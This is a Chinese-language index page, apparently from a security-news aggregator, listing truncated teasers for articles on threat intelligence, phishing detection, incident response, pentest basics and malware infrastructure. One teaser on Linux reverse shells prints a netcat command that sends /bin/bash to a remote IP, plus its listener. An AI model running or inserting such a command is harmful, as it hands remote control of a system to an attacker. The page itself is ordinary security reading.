威胁情报网关(Threat Intelligence Gateway, TIG)作为网络安全的新生代产品,与我们熟知的其他安全解决方案的怎样做到优势互补?威胁情报网关是什么?威胁情报网关Threat ...
安全闲碎
安全闲碎
安全闲碎
使用MurMurHash在Shodan平台上寻找钓鱼网站
关于MurMurHashMurMurHash这款工具可以帮助广大研究人员计算一个网站中favicon的MurMurHash值,并在Shodan平台上寻找钓鱼网站。MurMurHash是一种非加密的哈希...
安全闲碎
攻击应急溯源的一些常见思路
被黑了就要知道为什么被黑了怎么被黑的,不能这么不明不白。 0x1 主体思路常规出现的、容易被用户感知的异常点举例如下:1. 网页被篡改、被挂上了黑链、web文件丢失等2.&nbs...
安全闲碎
9 种开源的服务网格比较
哪种服务网格最适合你的企业?近年来,Kubernetes 服务网格框架数量增加迅速,使得这成为一个棘手的问题。下面将介绍 9 种较受欢迎的用以支撑微服务开发的服务网格框架,每种方案都给出了其适用场景。...
安全闲碎
网络钓鱼渗透测试的五个最佳实践
点击蓝字关注我们网络钓鱼模拟,或所谓的网络钓鱼渗透测试已成为各种规模组织的网络安全培训计划的一个流行功能。其方式大致如下:执行网络钓鱼测试的安全人员制作并向员工发送电子邮件,这些电子邮件看上去跟真正的...
安全闲碎
小白应该掌握的渗透测试基础总结
猫爪子的诱惑〜关注我呀〜一、渗透流程信息收集漏洞验证/漏洞攻击提权,权限维持日志清理信息收集一般先运行端口扫描和漏洞扫描获取可以利用的漏洞。多利用搜索引擎端口扫描有授权的情况下直接使用nmap、mas...
安全闲碎
KCon 议题大众评选|要害之地:5GC威胁分析案例分享
KCon 2021 议题大众评选活动已正式启动我们将持续展示今年的候选议题所有期待 KCon 的朋友们快来为自己感兴趣的议题打分吧~(戳此回顾大众评选流程/规则)IT'S SHOW TIME!候选议题...
安全闲碎
如何推测恶意软件的下一次攻击
当我们分析一个流行的恶意软件家族时,会首先查看其使用的恶意基础设施,从而收集线索,查找幕后的开发者。本文就以Dridex为例,来说说如何利用恶意基础设施来推测下一次可能的攻击。DridexDridex...
安全闲碎
智库说 | VIPKID朱模卿:浅论数据安全的“点线面位体”和7个习惯
与智者同行,为行业赋能。FreeBuf咨询TTSP智库作为行业安全专家聚集区,旨在聚合每一份安全中坚力量,以促进网络安全行业技术创新和知识布道为价值导向,凝聚智者力量,思维碰撞、经验共享,共创安全聚合...
安全闲碎
内刊上线|探访网安守护人的“城池营垒”
春天如期而至第48期内刊《绿盟+》&《安全+》也和大家见面啦这里承载了绿盟科技的文化生活与技术底蕴让我们一起走近那些身边的绿盟人吧本期精选★ 游戏宅的其乐无穷,让出差也能HaloNight的秘...
安全闲碎
Linux下反弹的10种方法
方法1.SHELL执行: nc 192.168.1.133 8080 -e /bin/bash监听执行 :nc -n -vv -l -p 8080方法2:SHELL执行:mknod backpipe...
安全闲碎
某服务器被黑,“MMC无法创建管理单元”的恢复技巧
某服务器被扫肉鸡的黑客黑了,上去以后发现任务管理器无法使用,taskkill等命令均无法使用。几个跑1433弱口令的工具跑着。net user 一下看到有hacker$的帐户。“计算机管理”里“本地用...
